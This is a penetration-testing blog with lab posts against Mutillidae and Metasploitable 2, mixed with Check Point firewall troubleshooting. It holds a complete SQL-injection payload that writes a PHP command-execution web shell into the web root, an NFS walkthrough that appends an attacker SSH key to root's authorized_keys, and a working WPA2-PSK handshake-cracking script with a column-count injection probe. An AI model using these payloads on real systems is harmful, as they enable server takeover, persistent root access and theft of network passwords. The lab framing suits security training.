Bilgi Güvenliği Analizi (Information Security Analysis), a blog by Ekin Tulga<br />
<br />
Mutillidae: Inject Web Shell Backdoor via SQL Injection, posted 2014-04-14<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/lcaqam-CyBE?feature=player_embedded' frameborder='0'></iframe></div>
<br />
Using a somewhat more advanced SQL injection, we write a new PHP file into the web root of the PHP server through the SQL injection vulnerability in Mutillidae's login form. The injected file is a command shell written in PHP: it runs whatever is submitted to it with the privileges of the account the web server (and therefore PHP) runs under. That is not "root" as such, but on a default Windows XAMPP installation it is often an administrative or SYSTEM account, which is just as bad.<br />
<br />
Two things have to hold on the MySQL side for this to work: the application's database user needs the FILE privilege (SELECT ... INTO DUMPFILE is refused without it), and the MySQL server process must be allowed to create files in the target directory (secure_file_priv, where set, restricts where it may write). The relative path in the payload is resolved from the MySQL data directory, which is why it climbs up with ..\\..\\ before descending into htdocs.<br />
<br />
A harmless example, written as the full POST body:<br />
<br />
username=' union select null,1,null,null,null INTO DUMPFILE 'test.txt' -- '&password=&login-php-submit-button=Login<br />
<br />
The backdoor, as the value of the username field. The UNION has to supply the same number of columns as the original login query, five here, matching the harmless example above:<br />
<br />
' union select null,null,null,'<form action="" method="post" enctype="application/x-www-form-urlencoded"><table style="margin-left:auto; margin-right:auto;"><tr><td colspan="2">Please enter system command</td></tr><tr><td></td></tr><tr><td class="label">Command</td><td><input type="text" name="pCommand" size="50"></td></tr><tr><td></td></tr><tr><td colspan="2" style="text-align:center;"><input type="submit" value="Execute Command" /></td></tr></table></form><?php echo "<pre>";echo shell_exec($_REQUEST["pCommand"]);echo "</pre>"; ?>',null INTO DUMPFILE '..\\..\\htdocs\\mutillidae\\backdoor.php' -- <br />
<br />
Hurray!<br />
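As an added example (not from the original post, the video, or the Mutillidae project), the following Python script reproduces the mechanics of the login-form injection against an in-memory SQLite copy of a five-column accounts table: the string-concatenated query is hit with the page's UNION payload, the same payload against a parameterized query returns nothing, and, going one step beyond the post, a probe finds the column count the way a tester would by hand. SQLite has no INTO DUMPFILE, so the file-write part is MySQL-specific and is left out; the table layout, column names and sample rows are assumptions constructed for the demo.

```python
import sqlite3

# Constructed sample data: a five-column accounts table in the shape of
# Mutillidae's (column names assumed; only the column count matters for UNION).
SCHEMA = """
CREATE TABLE accounts (
    cid INTEGER PRIMARY KEY,
    username TEXT,
    password TEXT,
    mysignature TEXT,
    is_admin TEXT
);
INSERT INTO accounts VALUES (1, 'admin', 'adminpass', 'g0t r00t?', 'TRUE');
INSERT INTO accounts VALUES (2, 'john', 'monkey', 'I like the smell of confunk', 'FALSE');
"""


def fresh_db():
    """Open an in-memory database seeded with the constructed accounts table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn, username, password):
    """The injectable form: user input is pasted straight into the SQL text."""
    sql = ("SELECT * FROM accounts WHERE username='%s' AND password='%s'"
           % (username, password))
    return conn.execute(sql).fetchall()


def login_parameterized(conn, username, password):
    """The fix: bound parameters, so input is compared as data, never parsed as SQL."""
    sql = "SELECT * FROM accounts WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchall()


def find_union_column_count(conn, max_cols=10):
    """Probe the column count the way a tester does by hand: grow the NULL list
    until the UNION stops failing. Returns the count, or None if nothing matched."""
    for n in range(1, max_cols + 1):
        payload = "' union select " + ",".join(["null"] * n) + " -- "
        try:
            login_vulnerable(conn, payload, "")
            return n
        except sqlite3.OperationalError:
            # "SELECTs to the left and right of UNION do not have the same
            # number of result columns" -- wrong count, try the next one.
            continue
    return None


# The page's harmless payload, minus the MySQL-only INTO DUMPFILE clause.
# In MySQL the file write would sit right before the trailing comment.
UNION_PAYLOAD = "' union select null,1,null,null,null -- "


def demo():
    """Run the three checks and return (column_count, injected_rows, safe_rows)."""
    conn = fresh_db()
    cols = find_union_column_count(conn)
    injected = login_vulnerable(conn, UNION_PAYLOAD, "")
    safe = login_parameterized(conn, UNION_PAYLOAD, "")
    return cols, injected, safe


if __name__ == "__main__":
    cols, injected, safe = demo()
    print("column count:", cols)                       # 5
    print("vulnerable query returned:", injected)      # the attacker-supplied row
    print("parameterized query returned:", safe)       # nothing
```

The attacker-supplied row comes back from the vulnerable query even though no account matched, which is exactly the slot the MySQL payload uses to carry the PHP text into INTO DUMPFILE; the parameterized query treats the whole payload as a literal username and finds nothing.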
Ekin Tulga<br />
<br />
SQL Injection using SQLMap to Dump Some Cool Stuff (mutillidae), posted 2014-04-11<br />
Once you have saved the raw HTTP request from Burp Suite to a text file, hand that file to SQLMap with -r and let it take the injection from there; the screenshots below show the run.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX7OSg3VcnIRyuuO8sH4i9H2D1C6Gqh9EqdjNrWzFamTguXE_OJNnD0ovTrNjA07btbX98MwmZOxKnfFCCMqroUzn0rBFHKF6V7jDXLNftG772iZ_yJg1GiOVmr4mZPWDN_MgI-f0lsjhP/s1600/sqlmap1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX7OSg3VcnIRyuuO8sH4i9H2D1C6Gqh9EqdjNrWzFamTguXE_OJNnD0ovTrNjA07btbX98MwmZOxKnfFCCMqroUzn0rBFHKF6V7jDXLNftG772iZ_yJg1GiOVmr4mZPWDN_MgI-f0lsjhP/s1600/sqlmap1.PNG" height="16" width="400" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO_Xlx82Jy65NO3LSdCWhEUI4wJSXcc-hJGkUMgzp92XrGw93zF7Muvc5Tl1jdVPUtG4KvGafCtIS1_kPdIE2s6haXA67KAcdPy_MV2b2IMkQwaKFN01bmYdbOXqR4MZl3BcO3Nc6OjJyl/s1600/sqlmap2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO_Xlx82Jy65NO3LSdCWhEUI4wJSXcc-hJGkUMgzp92XrGw93zF7Muvc5Tl1jdVPUtG4KvGafCtIS1_kPdIE2s6haXA67KAcdPy_MV2b2IMkQwaKFN01bmYdbOXqR4MZl3BcO3Nc6OjJyl/s1600/sqlmap2.PNG" height="140" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwW0lLWq5XhM0e9ROhNVTwzADxL2z9gMhh6LvoeFnEnZzEBcZr5QX3ITEoJrWsCkKD0TwNAKUxqDStX_0vHs2pewP6ChtW9RGo3qhfgxZ0DrO7sbpinZee39cuebG_WLCUIw7zUOOmePfM/s1600/sqlmap3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwW0lLWq5XhM0e9ROhNVTwzADxL2z9gMhh6LvoeFnEnZzEBcZr5QX3ITEoJrWsCkKD0TwNAKUxqDStX_0vHs2pewP6ChtW9RGo3qhfgxZ0DrO7sbpinZee39cuebG_WLCUIw7zUOOmePfM/s1600/sqlmap3.PNG" height="15" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmm8ImUwC4oH2oYG8DS6uNN83B2WZs9TgG6uGA12Vp31_00bB5ZrkGmbRs23sUrRBMo8Zu_r5wIK9se4YG7rgKYP-iUh4ipFU0a2rRytASpH7NH79WZPpBXYJlZSGG3aQH8KuMI2E4xUt7/s1600/sqlmap5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmm8ImUwC4oH2oYG8DS6uNN83B2WZs9TgG6uGA12Vp31_00bB5ZrkGmbRs23sUrRBMo8Zu_r5wIK9se4YG7rgKYP-iUh4ipFU0a2rRytASpH7NH79WZPpBXYJlZSGG3aQH8KuMI2E4xUt7/s1600/sqlmap5.PNG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgN6RjvpfapK7j5TUooLDVzR8vOF5r4wp4MonVkNIJcC1UVIO1lWh5p2TCikn4GE1USupaBURSMMx3PlNcbX9X2clSg5K1gb8XWYL-SqFTsWiaSVt_VkN4fimSmsGP36FeLqQnBVyqIbgRA/s1600/sqlmap55.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgN6RjvpfapK7j5TUooLDVzR8vOF5r4wp4MonVkNIJcC1UVIO1lWh5p2TCikn4GE1USupaBURSMMx3PlNcbX9X2clSg5K1gb8XWYL-SqFTsWiaSVt_VkN4fimSmsGP36FeLqQnBVyqIbgRA/s1600/sqlmap55.PNG" height="15" width="400" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdsmrNHD_WdzY3toELNM6FXtQHdPUloJGQBPw8qYOTfDLJot9snsHYxpQdE3Mae1qZco1cdJE0Ea3P9NF1d5GyjLVM2VvdttzZt6ESDM5YmT14tRObbrC9HXkApXgJlvBtJCr9ifUBG-aT/s1600/sqlmap4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdsmrNHD_WdzY3toELNM6FXtQHdPUloJGQBPw8qYOTfDLJot9snsHYxpQdE3Mae1qZco1cdJE0Ea3P9NF1d5GyjLVM2VvdttzZt6ESDM5YmT14tRObbrC9HXkApXgJlvBtJCr9ifUBG-aT/s1600/sqlmap4.PNG" height="128" width="400" /></a></div>
<br />Ekin Tulga<br />
<br />
Brute-force Authentication - Burp Suite, posted 2014-04-11<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/frtkNB5G3vI?feature=player_embedded' frameborder='0'></iframe></div>
<br />
Here are the basic methods for brute-forcing a web application login with Burp Suite. I found it very clean and tidy. Nice work.<br />
Ekin Tulga<br />
<br />
Checkpoint Remote Access 'connection failed' Issue with Windows 8 or 8.1, posted 2014-04-10<br />
I have seen this issue at a couple of clients; they were running Windows 8 and Windows 8.1.<br />
<br />
They tried to connect with Remote Access Client E75.30, but a 'connection failed' popup appeared straight away. There are a couple of SKs (Check Point support solutions) about duplicate IP addresses and similar causes.<br />
<br />
The simple fix: install the <b style="font-style: italic;">Remote Access Clients E80.42 MSI</b> instead.<br />
Details:<br />
<ul>
<li>File Name: CP_EPS_E80.42_RAC_Windows.msi</li>
<li>Product: Endpoint Security VPN</li>
<li>Version: R80</li>
<li>Minor Version: E80.42</li>
<li>OS: Windows</li>
<li>MD5: 054fda63c4fcc84eeb4e465235ee5254</li>
<li>Size: 15.90 MB</li>
<li>Date Published: 12/10/2013</li>
</ul>
Compare the MD5 of the downloaded file against the value above before installing it.<br />
<br />
<br />
It worked a treat.<br />
<br />
<br />
<br />Ekin Tulga<br />
<br />
Mutillidae: Basics of Web Request and Response Interception with Burp-Suite, posted 2014-03-24<br />
There is a bit more in this one:<br />
<br />
<ul>
<li>It shows how to bypass JavaScript validation built into the client side (the browser). Those checks only run in the browser, so a request modified in an intercepting proxy after the page has "validated" it reaches the server untouched; the server has to validate input on its own.</li>
<li>Submit ordinary strings through the form, then change them into SQL injection strings on the fly with Burp or another proxy utility before forwarding the request.</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/qsE04AhlJrc?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
Fun stuff! :)<br />
Ekin Tulga<br />
<br />
Exposing Flash Application Vulnerabilities with SWFScan, posted 2014-03-19<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/_bHtGD3qUVg?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
Download link on HP's "Following the White Rabbit" blog:<br />
<a href="http://h30499.www3.hp.com/t5/Following-the-White-Rabbit-A/SWFScan-FREE-Flash-decompiler/ba-p/5440167" target="_blank">http://h30499.www3.hp.com/t5/Following-the-White-Rabbit-A/SWFScan-FREE-Flash-decompiler/ba-p/5440167</a><br />
Ekin Tulga<br />
<br />
sessions (msfconsole), posted 2014-03-13<br />
Is there a background session?<br />
<br />
<pre>sessions</pre>
lists the sessions established.<br />
<br />
To interact with one of them:<br />
<br />
<pre>sessions -i [session_id]</pre>
<br />
<br />Ekin Tulga<br />
<br />
Unix Fundamentals - NFS Service / Attack Illustration, posted 2014-03-13<br />
<b>Let's look at the Network File System (NFS). NFS can be identified by probing port 2049 directly or by asking the portmapper for a list of services. The example below uses rpcinfo to identify NFS and showmount -e to determine that the "/" share (the root of the file system) is being exported. You will need the rpcbind and nfs-common Ubuntu packages to follow along.</b><br />
<br />
<pre>root@ubuntu:~# rpcinfo -p 192.168.99.131
.
.
.
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
.
.
.

root@ubuntu:~# showmount -e 192.168.99.131
</pre>
<br />
<b>Getting access to a system with a writeable filesystem like this is trivial. To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account's authorized_keys file.</b> Note that writing into /root/.ssh over the mount only works because this export does not squash root: with the default root_squash option, root on the client is mapped to the anonymous user (nobody) on the server and the write is refused. Metasploitable 2 exports / with no_root_squash, which is what makes this attack possible.<br />
<br />
<pre>root@ubuntu:~# ssh-keygen
root@ubuntu:~# mkdir /tmp/r00t
root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/

mount.nfs: rpc.statd is not running but is required for remote locking.
mount.nfs: Either use '-o nolock' to keep locks local, or start statd.
mount.nfs: an incorrect mount option was specified.</pre>
<br />
<b>This is the message you get when you try to mount the NFS export on a client where rpc.statd is not running.</b><br />
<br />
<b>Restarting nfs-common alone is not enough:</b><br />
<br />
<ul>
<li>service nfs-common restart</li>
</ul>
<br />
Restarting rpcbind (after which statd comes up) resolves the issue:<br />
<br />
<ul>
<li>service rpcbind restart</li>
</ul>
<br />
Alternatively, as the error message itself says, mount with -o nolock to keep locks local; this attack does not need remote locking at all.<br />
<br />
<pre>root@ubuntu:~# cat /root/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys

root@ubuntu:~# ssh root@192.168.99.131

// SSH now authenticates with the key we just generated (enter the passphrase you
// chose in ssh-keygen, if you set one): our public key was appended to root's
// authorized_keys on the remote machine, so we land straight in a root shell. yay.

root@metasploitable:~#</pre>
<br />
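As an added example (not part of the original post or of the Rapid7 write-up it references), here is a small Python helper that does the enumeration step of the procedure above offline: it parses rpcinfo -p and showmount -e output, reports where the nfs program is registered and which versions it offers, flags exports that any client may mount, and builds the mount command with the -o nolock workaround for the statd error. The sample output is constructed in the format of those tools rather than captured from a host; the address 192.168.99.131 is the one used above.

```python
import re

# Constructed sample output in the format of `rpcinfo -p 192.168.99.131`
# (not captured from a real host; Metasploitable 2 registers more services).
RPCINFO_SAMPLE = """\
   program vers proto   port  service
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  35010  status
    100024    1   tcp  38503  status
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   udp   2049  nfs
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100005    1   udp  47229  mountd
    100005    1   tcp  55738  mountd
"""

# Constructed sample output in the format of `showmount -e 192.168.99.131`.
SHOWMOUNT_SAMPLE = """\
Export list for 192.168.99.131:
/ *
"""

NFS_PROGRAM = 100003  # RPC program number for nfs, as printed by rpcinfo


def parse_rpcinfo(text):
    """Return (program, version, proto, port, service) tuples from `rpcinfo -p` output."""
    entries = []
    for line in text.splitlines():
        m = re.match(r"\s*(\d+)\s+(\d+)\s+(tcp|udp)\s+(\d+)\s+(\S+)", line)
        if m:
            prog, vers, proto, port, svc = m.groups()
            entries.append((int(prog), int(vers), proto, int(port), svc))
    return entries


def nfs_endpoints(entries):
    """(proto, port) pairs on which the nfs program is registered. The post's
    'probe port 2049 directly' shortcut works because this is nearly always 2049."""
    return sorted({(proto, port) for prog, _, proto, port, _ in entries if prog == NFS_PROGRAM})


def nfs_versions(entries):
    """NFS protocol versions the server offers."""
    return sorted({vers for prog, vers, _, _, _ in entries if prog == NFS_PROGRAM})


def parse_showmount(text):
    """Return {export_path: [client_spec, ...]} from `showmount -e` output.
    showmount prints one export per line as '<path> <client>,<client>,...'."""
    exports = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("Export list"):
            continue
        path, _, clients = line.strip().partition(" ")
        exports[path] = clients.split(",") if clients else []
    return exports


def world_exports(exports):
    """Exports any host may mount (client spec '*'); '/' means the whole server
    filesystem. Whether writes land as root still depends on the server's
    no_root_squash setting, which showmount cannot reveal."""
    return sorted(path for path, clients in exports.items() if "*" in clients)


def mount_command(host, export, mountpoint):
    """Mount command with the '-o nolock' workaround for the rpc.statd error."""
    return "mount -t nfs -o nolock %s:%s %s" % (host, export, mountpoint)


if __name__ == "__main__":
    entries = parse_rpcinfo(RPCINFO_SAMPLE)
    print("nfs registered on:", nfs_endpoints(entries))   # [('tcp', 2049), ('udp', 2049)]
    print("nfs versions:", nfs_versions(entries))         # [2, 3, 4]
    exports = parse_showmount(SHOWMOUNT_SAMPLE)
    for path in world_exports(exports):
        print(mount_command("192.168.99.131", path, "/tmp/r00t"))
```

Feed it the real output of the two commands (for example via subprocess) and it gives you the same answer the post reaches by eye: nfs on 2049, and / exported to the world.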
The environment consists of Kali and Metasploitable 2.<br />
<br />
Reference:<br />
<a href="https://community.rapid7.com/docs/DOC-1875">https://community.rapid7.com/docs/DOC-1875</a><br />
Ekin Tulga<br />
<br />
Debug Policy Install, posted 2014-03-04<br />
Debugging a manual policy pull from the enforcement point, and a push from the SmartCenter, like so:<br />
<div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div style="margin: 0in;">
fw -d fetch &lt;SmartCenter server IP address&gt;<br /></div>
<ul>
<li>fw -d fetchlocal -d $FWDIR/state/__tmp/FW1 &amp;&gt; &lt;output file&gt;</li>
</ul>
<br />Also collect the cpd.elg files from $CPDIR/log on the firewall.<br /><br />Push from the SmartCenter to the enforcement point:<br />
<div style="margin: 0in;">
<br />fwm -d load policy_name gateway_name 2&gt; &lt;filename&gt;.txt</div>
Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-79578004600509682532014-03-04T13:44:00.002+02:002014-03-04T13:44:32.460+02:00Policy installation fails with "ERROR: function or table < pgm_len_block_code > undefined" and ".../conf/updates.def"<table border="0" cellpadding="0" cellspacing="0" class="unoverflowed-table" style="background-color: white; color: black; font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12.800000190734863px; table-layout: fixed; width: 750pxpx; word-wrap: break-word;"><tbody>
<tr><td class="sc-pageTitleSub3Black" style="font-size: 13px; font-weight: bold; text-transform: uppercase;"><br /><br />SYMPTOMS</td></tr>
<tr><td class="sc-solutionSymptom" width="80%"><ul class="sc-solution" style="font-size: 12px; margin: 0px 0px 0px 15px; padding: 0px 0px 0px 3px;">
<li>After upgrading a Security Management Server to R76, policy installation in SmartDashboard fails with the following errors:<pre>"/opt/.../conf/updates.def", line <em>N</em>: ERROR: syntax error
"/opt/.../conf/<em>&lt;Policy_Name&gt;</em>.pf", line <em>N</em>: ERROR: function or table &lt; pgm_len_block_code &gt; undefined
"/opt/.../conf/<em>&lt;Policy_Name&gt;</em>.pf", line <em>N</em>: ERROR: syntax error
Compilation failed.
Operation ended with errors.
</pre>
</li>
<li>Debug of FWM daemon (per <a href="http://supportcontent.checkpoint.com/solutions?id=sk86186" style="color: #905690;" target="_blank">sk86186</a>) shows the same '<code style="font-family: 'Courier New', Courier, monospace;">ERROR: syntax error</code>'.<br /></li>
<li>Hotfix for IPv6 flavor issue from <a href="http://supportcontent.checkpoint.com/solutions?id=sk92933" style="color: #905690;" target="_blank">sk92933</a> does not help.</li>
</ul>
</td></tr>
<tr><td class="sc-pageTitleSub3Black " style="font-size: 13px; font-weight: bold; text-transform: uppercase;">CAUSE</td></tr>
<tr><td class="sc-solutionCause" style="font-size: 12px;">IPS definitions are not up to date, or do not exist.<br />
<br />
<span style="font-size: 12.8px; font-weight: bold; text-transform: uppercase;">SOLUTION</span><br />
<br />
<span style="font-size: 12px;">Perform an IPS Update in SmartDashboard, then retry the policy installation.</span><br />
<br />
The same issue was also seen on an R77 environment.<br />
</td></tr>
</tbody></table>
Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-68172935920827809922014-01-02T18:23:00.001+02:002014-01-02T18:24:30.986+02:00"du" //du -sh<div class="separator" style="clear: both; text-align: center;">
grand!</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuDzH5tgSMkP2JdNtMl7ewFoYsyQmSHvW0FbYsPCzNRsG2nkUQgqHPXLXG-dpBp06g78OIM-GrRcsH8GnMaQAURCxdraRj8HGxJAYJ5E6REiJeGUgsnerrUlULQzUuv0_frvueEb1PEo2R/s1600/du-sh.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="270" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuDzH5tgSMkP2JdNtMl7ewFoYsyQmSHvW0FbYsPCzNRsG2nkUQgqHPXLXG-dpBp06g78OIM-GrRcsH8GnMaQAURCxdraRj8HGxJAYJ5E6REiJeGUgsnerrUlULQzUuv0_frvueEb1PEo2R/s400/du-sh.PNG" width="400" /></a></div>
<br />Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-65844492293118585172013-09-11T02:29:00.004+03:002013-09-11T02:29:46.821+03:00Pyrit -WPA/WPA2-PSK Epic Fail-<div style="background-color: white; font-family: arial, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<strong><i>Pyrit</i></strong> allows creating massive databases that pre-compute part of the <a href="https://secure.wikimedia.org/wikipedia/en/wiki/Wi-Fi_Protected_Access" rel="nofollow" style="color: #0000cc;">IEEE 802.11 WPA/WPA2-PSK</a> authentication phase, a space-time trade-off. By exploiting the computational power of many-core and other platforms through <a href="http://ati.amd.com/technology/streamcomputing/" rel="nofollow" style="color: #0000cc;">ATI-Stream</a>, <a href="http://www.nvidia.com/object/cuda_home.html" rel="nofollow" style="color: #0000cc;">Nvidia CUDA</a> and <a href="http://www.khronos.org/opencl/" rel="nofollow" style="color: #0000cc;">OpenCL</a>, it is currently by far the most powerful attack against one of the world's most used security protocols.</div>
<div style="background-color: white; font-family: arial, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<br /></div>
<div style="background-color: white; font-family: arial, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
WPA/WPA2-PSK is a subset of <a href="https://secure.wikimedia.org/wikipedia/en/wiki/Wi-Fi_Protected_Access" rel="nofollow" style="color: #0000cc;">IEEE 802.11 WPA/WPA2</a> that skips the complex task of key distribution and client authentication by assigning every participating party the same <i>pre-shared key</i>. This <i>master key</i> is derived from a password which the administrating user has to pre-configure, e.g. on his laptop and on the Access Point. When the laptop creates a connection to the Access Point, a new <i>session key</i> is derived from the <i>master key</i> to encrypt and authenticate the following traffic. The "shortcut" of using a single <i>master key</i> instead of <i>per-user keys</i> eases deployment of WPA/WPA2-protected networks for home and small-office use, at the cost of making the protocol vulnerable to brute-force attacks against its key negotiation phase, which ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous, as the protocol allows much of the key derivation to be pre-computed, making simple brute-force attacks even more alluring to the attacker. For more background see <a href="http://pyrit.wordpress.com/the-twilight-of-wi-fi-protected-access/" rel="nofollow" style="color: #0000cc;">this article</a> on the project's <a href="http://pyrit.wordpress.com/" rel="nofollow" style="color: #0000cc;">blog</a>.</div>
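<div style="background-color: white; font-family: arial, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
The following is an added example written for this post; it is not Pyrit's code and not taken from the project page. It shows in plain Python why the pre-computation works: the expensive PBKDF2 step maps (passphrase, SSID) to the PMK and never touches the handshake, so a table built once per SSID serves every capture from that network, and all that is left per candidate is a cheap PRF/HMAC check against the MIC of a captured 4-way handshake message. The SSID, passphrase, MAC addresses, nonces and EAPOL frame are all constructed for the demo; only the Python standard library is used.</div>

```python
"""Added example (not Pyrit's code, not from the original post).

The expensive step of WPA/WPA2-PSK, PBKDF2 over (passphrase, SSID), does not
depend on anything from the handshake, so it can be pre-computed per SSID and
reused against every capture from that network.  Only the cheap PRF/HMAC step
needs the captured MACs, nonces and EAPOL frame.

All inputs below are constructed for the demo; only the standard library is used.
"""
import hashlib
import hmac

# EAPOL-Key frame layout: 4-byte 802.1X header, then 77 bytes of key descriptor
# fields (type, key info, key length, replay counter, nonce, IV, RSC, ID)
# before the 16-byte MIC field.
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is what Pyrit pre-computes; the SSID is the salt, which is why its
    tables are built per ESSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", sorted MACs || sorted nonces).
    Cheap: a handful of HMAC calls, no iteration count."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)  # 4 x 20 bytes covers the 64 bytes needed
    ]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 MIC (key descriptor version 2): HMAC-SHA1 over the whole EAPOL frame
    with the MIC field zeroed, truncated to 16 bytes. KCK = PTK[0:16]."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_handshake(passphrase, ssid, aa, spa, anonce, snonce):
    """Constructed stand-in for what a sniffer captures: message 2 of the 4-way
    handshake, MIC'd by a supplicant that knows the passphrase. The attacker
    sees the MACs, both nonces and this frame, never the passphrase or PMK."""
    pmk = pmk_from_passphrase(passphrase, ssid)
    kck = ptk_from_pmk(pmk, aa, spa, anonce, snonce)[:16]
    body = (b"\x02"                     # descriptor type: RSN
            + b"\x01\x0a"               # key info: HMAC-SHA1 version, pairwise, MIC bit
            + b"\x00\x10"               # key length
            + bytes(8)                  # replay counter
            + snonce                    # key nonce
            + bytes(16) + bytes(8) + bytes(8))  # IV, RSC, ID
    frame = b"\x01\x03\x00\x5f" + body + bytes(16) + b"\x00\x00"  # 802.1X hdr, MIC=0, key data len
    frame = frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce, "eapol": frame}


def precompute_table(ssid: str, wordlist) -> dict:
    """Pyrit's database in miniature: one PMK per candidate, computed once per SSID."""
    return {word: pmk_from_passphrase(word, ssid) for word in wordlist}


def crack(handshake: dict, table: dict):
    """Try every pre-computed PMK against the capture: PRF + one HMAC per candidate."""
    frame = handshake["eapol"]
    captured_mic = frame[MIC_OFFSET:MIC_OFFSET + 16]
    for word, pmk in table.items():
        kck = ptk_from_pmk(pmk, handshake["aa"], handshake["spa"],
                           handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, frame), captured_mic):
            return word
    return None


def demo():
    """Run the whole flow on constructed data. Returns (recovered passphrase,
    result when the table was built for a different SSID)."""
    aa, spa = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    capture = build_handshake("Sup3rS3cret", "corp-wifi", aa, spa, anonce, snonce)
    table = precompute_table("corp-wifi", ["letmein", "Sup3rS3cret", "password1"])
    wrong_ssid = precompute_table("other-wifi", ["Sup3rS3cret"])
    return crack(capture, table), crack(capture, wrong_ssid)


if __name__ == "__main__":
    print(demo())
```

<div style="background-color: white; font-family: arial, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
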